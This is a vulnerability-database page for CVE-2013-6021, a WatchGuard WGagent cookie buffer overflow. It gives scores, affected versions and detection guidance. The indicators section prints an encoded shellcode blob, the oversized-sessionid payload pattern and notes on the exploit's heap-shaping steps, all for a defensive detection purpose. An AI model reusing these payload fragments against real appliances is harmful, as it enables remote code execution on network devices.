cbcvebase.
CVE-2013-6021
published 2013-10-19

CVE-2013-6021: Buffer overflow in WGagent in WatchGuard WSM and Fireware before 11.8 allows remote attackers to execute arbitrary code via a long sessionid value in a cookie.

PriorityP258critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
12.20%
95.7th percentile
Buffer overflow in WGagent in WatchGuard WSM and Fireware before 11.8 allows remote attackers to execute arbitrary code via a long sessionid value in a cookie.

Affected

12 ranges
VendorProductVersion rangeFixed in
watchguardfireware<= 11.7.4
watchguardfireware
watchguardfireware
watchguardfireware
watchguardfireware
watchguardfireware
watchguardfireware
watchguardfireware
watchguardfireware
watchguardfireware
watchguardfireware
watchguardfireware

Detection & IOCsextracted from sources · hover to see the quote

url/agent/ping
url/ping
port8080
commandCookie: sessionid=<140 x 'A'>\x44\x85
uaa(x100)Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0 a(x100)
bytes
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIMQJdYHfas030mQKusPQWVoEPLKK5wtKOKOkOnkMM4HkO9okOoOePXpwuuXOsJgs4LMbWUTk1KNs04PUXeXD4tKTyvgQeZNGIaOgtptC78kM7X8VXGK6fWxnmPGL0MkzTKoVegxmYneidKNKOkO9WK5HxkNYoyoUPuP7pGpNkCpvlk9k5UPIoKO9oLKnmL4KNyoKOlKk5qx9nioioLKNuRLKNioYoMY3ttdc4NipTq4VhMYTL14NazLxPERuP30oqzMn0G54OuPmkXtyOeUtHlKsevhnkRrc8HGW47TeTwpuPEPgpNi4TwTMnNpZyuTgxKOn6K90ELPNkQU7xLKg0r4oyctQ45TlMK35EISKOYoMYWt14MnppMfUTWxYohVk3KpuWMY0Empkw0ENXwtgpuPC0lKbenpLKSpF0IWPDQ4Fh30s0Wp5PlMmCrMo3KO9olIpTUts4nic44dMnqnyPUTTHKOn6LIbeLXSVIW0EMvVb5PKw3uNt7pgpWpuPiWpEnluPWpwpGpOO0KzN34S8kOm7A
bytes
\x8b\x41\x24\x29\xd0\x83\xc0\x40\x83\xe8\x35
  • Detect oversized sessionid cookie values in HTTP requests to /agent/ping on port 8080 (SSL); a sessionid value exceeding 120 characters (and especially 140+) is anomalous and indicative of exploitation.
  • Detect HTTP requests to /agent/ping with abnormally large User-Agent headers (e.g., >1800 bytes) combined with a Cookie header containing a sessionid field, targeting WatchGuard WGagent on port 8080.
  • Detect HTTP requests to /agent/ping with an Accept-Encoding header padded with large amounts of repeated bytes (e.g., 'b' x 1386), which is used to position shellcode in the exploit.
  • The exploit targets WatchGuard Fireware/WSM versions before 11.8; version fingerprinting of WGagent can help identify vulnerable instances.
  • ·The exploit hardcodes a target IP (192.168.60.200) and port (8080) for the WatchGuard XTM web console; real-world deployments may use different ports or IPs. Detection rules should not rely solely on these values.
  • ·The shellcode is alpha2-encoded to avoid bad characters (null bytes, control characters, spaces, quotes, ampersands, semicolons, and cookie delimiters); signature-based detection must account for this encoding and cannot rely on raw shellcode bytes alone.
  • ·The exploit uses SSL (IO::Socket::SSL) for all communications; network-level detection requires SSL/TLS inspection to inspect cookie and header contents.
  • ·The exploit uses a two-phase heap massage approach (step1: non-overflowing sessionid of 120 'A's to shape the heap; step2: overflowing sessionid of 140 bytes + 2-byte overwrite); detection must consider both request patterns.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.